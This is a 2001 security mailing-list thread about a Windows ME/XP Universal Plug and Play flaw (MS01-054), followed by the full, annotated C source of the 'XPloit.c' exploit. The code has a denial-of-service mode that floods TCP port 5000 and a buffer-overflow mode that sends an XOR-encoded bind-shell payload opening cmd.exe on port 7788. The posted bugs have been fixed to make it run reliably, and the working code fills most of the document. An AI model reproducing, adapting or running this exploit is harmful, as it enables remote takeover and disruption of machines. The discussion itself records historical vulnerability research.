Hello Ryan, Yes, this one is for a different hole, reported on Bugtraq by milo omega and covered by MS01-054 http://www.security.nnov.ru/search/news.asp?binid=1518 There are other exploits for this problem known in the wild. --Tuesday, December 25, 2001, 12:47:24 AM, you wrote to alteregoat_private: RP> I've been poking at the exploit, and from what I can see, this is NOT for RP> the eEye advisory, perhaps another bug, but I don't have an XP machine here RP> to do any type of analysis on this, so it is hard to say what it will do. RP> This may even be a similar/same bug however, and someone found a different RP> way of attacking it. Port 5000 TCP is also involved in the UPnP/SSDP RP> protocol, and is hosted in svchost.exe, so until further analysis is done, RP> little more can be said. RP> Signed, RP> Ryan Permeh RP> eEye Digital Security Team RP> http://www.eEye.com/Retina -Network Security Scanner RP> http://www.eEye.com/Iris -Network Traffic Analyzer RP> http://www.eEye.com/SecureIIS -Stop Known and Unknown IIS Vulnerabilities RP> ----- Original Message ----- RP> From: "Sebastian Wells" <alteregoat_private> RP> To: <vuln-devat_private> RP> Sent: Monday, December 24, 2001 9:45 AM RP> Subject: Re: "Universal Plug and Play technology exploit code" >> Is this an exploit for the most recent UPnP hole that was posted to RP> Bugtraq? >> In the discussion of that vulnerability it was stated that UPnP was on UDP >> port 1900. >> >> Am I just confused? >> >> - Sebastian >> ----- Original Message ----- >> From: <KRFinisterreat_private> >> To: <vuln-dev@security-focus.com> >> Sent: Monday, December 24, 2001 10:48 AM >> Subject: "Universal Plug and Play technology exploit code" >> >> >> > This code is NOT by me... I found it on the net today and thought that RP> you >> > guys may enjoy it. I saw no copyrights on this or messages stating NOT RP> to >> > post this code. 
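/*
 * WinME/XP UPnP DoS & overflow -- XPloit.c
 *
 * Posted to vuln-dev by KF on 2001-12-24 (not his code); fetched from
 * http://qb0x.net/exploits/XPloit.c
 *
 * Author: Gabriel Maggiotti <gmaggiotat_private>, http://qb0x.net
 * The -e payload (a cmd.exe shell bound to TCP port 7788) is credited to isno.
 *
 * Run: ./XPloit host <option>
 *
 * Windows runs the "Universal Plug and Play technology" service on TCP
 * port 5000 (the thread notes it is hosted in svchost.exe). The service has
 * a DoS and a buffer overflow; this program drives both:
 *
 *   -f  open FREEZE (512) connections to port 5000 and send "XP" on each;
 *       the original describes the effect as freezing the machine.
 *   -e  send one request built as: 268 filler bytes, a 4-byte value
 *       (0x77e33f4d little-endian; not explained in the original -- presumably
 *       the value that replaces an overwritten return address), four 0x90s,
 *       a "jmp [ebx+0x64]" stub, 32 more filler bytes, the XOR-encoded
 *       bind-shell payload and "\r\n\r\n".
 *
 * Historical exploit for an issue Microsoft patched in 2001 (the thread
 * identifies it as the hole covered by MS01-054). Kept as posted except for
 * fixes to the C itself, each noted where it applies:
 *   - bindport was read before being assigned (undefined behaviour) and then
 *     written over the port bytes of the payload;
 *   - num_socks/send_buffer were left uninitialised for any option other
 *     than -f/-e;
 *   - the payload was concatenated with strcat()/snprintf("%s") -- which
 *     works only because it happens to contain no NUL byte -- and the wire
 *     length was recomputed with strlen(); explicit lengths are used instead;
 *   - bzero()/h_addr are BSD extensions; memset()/h_addr_list[0] are used;
 *   - perror() after gethostbyname() reports an unrelated errno.
 */

#define _DEFAULT_SOURCE 1   /* gethostbyname() and friends are POSIX/BSD, not ISO C */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <netdb.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>

#define MAX      10000   /* capacity of the socket table */
#define PORT     5000    /* TCP port of the Windows UPnP service */
#define FREEZE   512     /* connections opened by -f */
#define NOP      0x43    /* "inc ebx", used as sled filler instead of 0x90 */
#define BINDPORT 7788    /* port the -e payload binds cmd.exe to */
#define XOR_KEY  0x97    /* the payload's decoder key ("xor byte [eax], 0x97") */

#define JMPCODE_LEN 280  /* bytes of jmpcode that go on the wire (the trailing NUL does not) */
#define SLED_LEN    32   /* NOP filler bytes placed between jmpcode and the payload */
#define PORT_OFFSET 778  /* offset of the two encoded bind-port bytes inside shellcode[] */

/*
 * isno's bind-shell payload, XOR-encoded with XOR_KEY; the first bytes are
 * the decoder. Reproduced byte for byte from the posting (788 bytes plus the
 * string NUL, which is never sent). Bytes PORT_OFFSET/PORT_OFFSET+1 hold the
 * bind port in network byte order, encoded: for 7788 (0x1e6c) that is
 * 0x1e^0x97 = 0x89 and 0x6c^0x97 = 0xfb, which is what the posted bytes are.
 */
static unsigned char shellcode[] =
    "\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90"
    "\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa"
    "\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36"
    "\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97"
    "\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14"
    "\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2"
    "\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14"
    "\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5"
    "\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1"
    "\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16"
    "\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68"
    "\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1"
    "\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94"
    "\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4"
    "\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68"
    "\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57"
    "\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4"
    "\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4"
    "\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5"
    "\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68"
    "\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67"
    "\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1"
    "\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf"
    "\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab"
    "\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0"
    "\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4"
    "\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0"
    "\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56"
    "\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7"
    "\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57"
    "\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4"
    "\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f"
    "\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xc7"
    "\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68"
    "\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f"
    "\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75"
    "\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0"
    "\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5"
    "\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2"
    "\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6"
    "\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97"
    "\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc"
    "\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb"
    "\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97"
    "\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2"
    "\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4"
    "\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97"
    "\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2"
    "\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97"
    "\x68\x68\x68\x68";

/*
 * Assemble the -e request into out (capacity cap):
 *   jmpcode (JMPCODE_LEN bytes) | SLED_LEN x NOP | encoded payload | "\r\n\r\n"
 * Returns the number of bytes written, or 0 if cap is too small.
 */
static size_t build_request(unsigned char *out, size_t cap)
{
    unsigned char jmpcode[JMPCODE_LEN + 1];
    const size_t payload_len = sizeof shellcode - 1;  /* drop the string NUL */
    const size_t total = JMPCODE_LEN + SLED_LEN + payload_len + 4;
    size_t off = 0;

    if (total > cap)
        return 0;

    /*
     * Patch the bind port into the payload. The original XORed an
     * uninitialised `bindport` with 0x9797 and stored the result here,
     * which overwrote the correct bytes with garbage; the port must be
     * encoded with XOR_KEY, high byte first (network order). For BINDPORT
     * 7788 this writes back exactly the posted bytes 0x89 0xfb.
     */
    shellcode[PORT_OFFSET]     = (unsigned char)(((BINDPORT >> 8) & 0xff) ^ XOR_KEY);
    shellcode[PORT_OFFSET + 1] = (unsigned char)((BINDPORT & 0xff) ^ XOR_KEY);

    memset(jmpcode, NOP, 268);
    /* 0x77e33f4d, little-endian -- not explained in the original posting. */
    jmpcode[268] = 0x4d;
    jmpcode[269] = 0x3f;
    jmpcode[270] = 0xe3;
    jmpcode[271] = 0x77;
    memset(jmpcode + 272, 0x90, 4);
    /* jmp [ebx+0x64]: jump to execute shellcode */
    jmpcode[276] = 0xff;
    jmpcode[277] = 0x63;
    jmpcode[278] = 0x64;
    jmpcode[279] = 0x90;
    jmpcode[280] = 0x00;  /* terminator as in the original; never sent */

    memcpy(out + off, jmpcode, JMPCODE_LEN);
    off += JMPCODE_LEN;
    memset(out + off, NOP, SLED_LEN);
    off += SLED_LEN;
    memcpy(out + off, shellcode, payload_len);
    off += payload_len;
    memcpy(out + off, "\r\n\r\n", 4);
    off += 4;
    return off;
}

/*
 * Entry point: ./XPloit <hostname> <-f|-e>.
 * Resolves the host, opens num_socks TCP connections to PORT, sends the
 * selected buffer on each and closes them. Exits 1 on usage, resolution,
 * socket, connect or send failure (the original exited 0 on a send failure).
 */
int main(int argc, char *argv[])
{
    int sockfd[MAX];
    static const char sendXP[] = "XP";
    unsigned char request[2048];
    const void *send_buffer = NULL;
    size_t send_len = 0;
    int num_socks = 0;
    int i;
    struct hostent *he;
    struct sockaddr_in their_addr;

    if (argc != 3) {
        fprintf(stderr, "usage:%s <hostname> <command>\n", argv[0]);
        fprintf(stderr, "-f freeze the machine.\n");
        fprintf(stderr, "-e exploit.\n");
        exit(1);
    }

    /*
     * Exact option match. The original used strstr(), so "-fe" selected
     * both branches and anything else left num_socks/send_buffer
     * uninitialised; unknown options are now rejected.
     */
    if (strcmp(argv[2], "-f") == 0) {
        num_socks = FREEZE;
        send_buffer = sendXP;
        send_len = strlen(sendXP);
    } else if (strcmp(argv[2], "-e") == 0) {
        num_socks = 1;
        send_len = build_request(request, sizeof request);
        if (send_len == 0) {
            fprintf(stderr, "request does not fit in %zu bytes\n", sizeof request);
            exit(1);
        }
        send_buffer = request;
    } else {
        fprintf(stderr, "unknown option '%s' (use -f or -e)\n", argv[2]);
        exit(1);
    }

    /* gethostbyname() does not set errno, so perror() would mislead here. */
    he = gethostbyname(argv[1]);
    if (he == NULL || he->h_addr_list[0] == NULL || he->h_addrtype != AF_INET
        || he->h_length != (int)sizeof(struct in_addr)) {
        fprintf(stderr, "gethostbyname: cannot resolve %s as an IPv4 host\n", argv[1]);
        exit(1);
    }

    memset(&their_addr, 0, sizeof their_addr);
    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(PORT);
    memcpy(&their_addr.sin_addr, he->h_addr_list[0], sizeof their_addr.sin_addr);

    /* Open every socket first, then connect them all, then send -- as posted. */
    for (i = 0; i < num_socks; i++) {
        if ((sockfd[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
            perror("socket");
            exit(1);
        }
    }

    for (i = 0; i < num_socks; i++) {
        if (connect(sockfd[i], (struct sockaddr *)&their_addr, sizeof their_addr) == -1) {
            perror("connect");
            exit(1);
        }
    }

    for (i = 0; i < num_socks; i++) {
        ssize_t sent = send(sockfd[i], send_buffer, send_len, 0);
        if (sent == -1) {
            perror("send");
            exit(1);
        }
        if ((size_t)sent != send_len) {
            fprintf(stderr, "send: short write on socket %d (%zd of %zu bytes)\n",
                    i, sent, send_len);
            exit(1);
        }
    }

    for (i = 0; i < num_socks; i++)
        close(sockfd[i]);

    return 0;
}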